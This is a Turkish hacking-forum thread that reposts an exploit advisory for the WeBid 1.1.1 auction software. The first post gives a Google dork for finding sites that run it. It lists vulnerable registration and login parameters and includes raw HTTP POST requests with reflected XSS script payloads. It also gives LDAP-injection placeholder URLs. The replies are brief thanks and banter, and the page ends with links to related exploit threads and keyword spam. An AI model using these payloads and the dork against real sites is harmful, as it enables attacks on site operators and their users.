Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Bug: WeBid 1.1.1 Cross Site Scripting / LDAP Injection ( Ascii Version )
#1
###########################################

#Exploit Title : WeBid Version 1.1.1 multiple vulnerability
#Author : Govind Singh aka NullPort
#Vendor : http://www.webidsupport.com/
#Download Link :
http://sourceforge.net/projects/simpleau...p/download
#Google Dork : "Powered by WeBid"
#Date : 11/07/2014
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi
#Greez to : All IHT Members
#

###########################################

1. Reflected Cross-Site Scripting :
2. LDAP Injection

1. http://localhost/WeBid/register.php


Reflected Cross-Site Scripting in the parameters are :
"TPL_name="
"TPL_nick="
"TPL_email"
"TPL_year"
"TPL_address"
"TPL_city"
"TPL_prov"
"TPL_zip"
"TPL_phone"
"TPL_pp_email"
"TPL_authnet_id"
"TPL_authnet_pass"
"TPL_wordpay_id"
"TPL_toocheckout_id"
"TPL_moneybookers_email"


PoC :
we can run our xss script with all these different parameters

Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/web-id/register.php
Cookie=WEBID_ONLINE=57e5a8970c4a9df8850c130e44e49160; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=417
POSTDATA=csrftoken=&TPL_name="><script>alert('Hacked By Govind Singh aka
NullPort');</script>&TPL_nick=&TPL_password=&TPL_repeat_password=&TPL_email=&TPL_day=&TPL_
month=00&TPL_year=&TPL_address=&TPL_city=&TPL_prov=&TPL_country=United+Kingdom&TPL_zip=&TPL_
phone=&TPL_timezone=0&TPL_nletter=1&TPL_pp_email=&TPL_authnet_id=&TPL_authnet_pass=&TPL_worldpay
_id=&TPL_toocheckout_id=&TPL_moneybookers_email=&captcha_code=&action=first
----------------------------------------------------------------------------------------------------------------
2. http://localhost/WeBid/user_login.php

Reflected Cross-Site Scripting in the parameter is :
"username"

Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/web-id/user_login.php
Cookie=WEBID_ONLINE=e54c2acd05a02315f39ddb4d3a112c1e; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=96
POSTDATA=username="><script>alert('xss PoC By Govind
Singh');</script>&password=&input=Login&action=login
==========================================


2. LDAP Injection

PoC :
http://localhost/WeBid/loader.php?js=[LDAP]
http://localhost/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js;

PoC
http://localhost/WeBid/viewhelp.php?cat=[LDAP]
Replace cat= as 1,2,3,4

----------------------------------------------------------------------------------------------------------------------
Beğenenler:
#2
Teşekkürler.
Beğenenler:
#3
Teşekkürler
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#4
Wuuuu Ne Cok Anladım Bı Bılsenız kiss
Beğenenler:
#5
(22-07-2014, Saat: 18:05)SiRReaLSTaR Adlı Kullanıcıdan Alıntı: Wuuuu Ne Cok Anladım Bı Bılsenız kiss
gogoleyi ac bug nedir diye arat bilmiyorsan onudamı biz sana söyluyelım akrdeşim
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  PhpLinks Cross Site Scripting Vulnerability archavin 39 285,737 30-10-2016, Saat: 12:35
Son Yorum: JoseQual
  創意細胞 SQL Injection H4Sec 27 753 10-03-2016, Saat: 18:37
Son Yorum: byhacı
  Israelian CMS Blind SQL Injection Vulnerability H4Sec 16 1,110 01-03-2016, Saat: 03:59
Son Yorum: Zany
  Joomla Nice Ajax Poll 1.4.0 SQL Injection ERTUĞRUL 0 123 12-12-2015, Saat: 03:08
Son Yorum: ERTUĞRUL
  Powered by PBBoard Forum © Version 3.0.0 Exploit Vulnerability KingSkrupellos 3 425 09-09-2015, Saat: 16:57
Son Yorum: Mr.F92
Anahtar Kelimeler

Bug: WeBid 1.1.1 Cross Site Scripting / LDAP Injection ( Ascii Version ) indir, Bug: WeBid 1.1.1 Cross Site Scripting / LDAP Injection ( Ascii Version ) Videosu, Bug: WeBid 1.1.1 Cross Site Scripting / LDAP Injection ( Ascii Version ) Online izle, Bug: WeBid 1.1.1 Cross Site Scripting / LDAP Injection ( Ascii Version ) Bedava indir, Bug: WeBid 1.1.1 Cross Site Scripting / LDAP Injection ( Ascii Version ) Yükle, Bug: WeBid 1.1.1 Cross Site Scripting / LDAP Injection ( Ascii Version ) Hakkında, Bug: WeBid 1.1.1 Cross Site Scripting / LDAP Injection ( Ascii Version ) Nedir, Bug: WeBid 1.1.1 Cross Site Scripting / LDAP Injection ( Ascii Version ) Free indir, Bug: WeBid 1.1.1 Cross Site Scripting / LDAP Injection ( Ascii Version ) Oyunu, Bug: WeBid 1.1.1 Cross Site Scripting / LDAP Injection ( Ascii Version ) Download


1 Ziyaretçi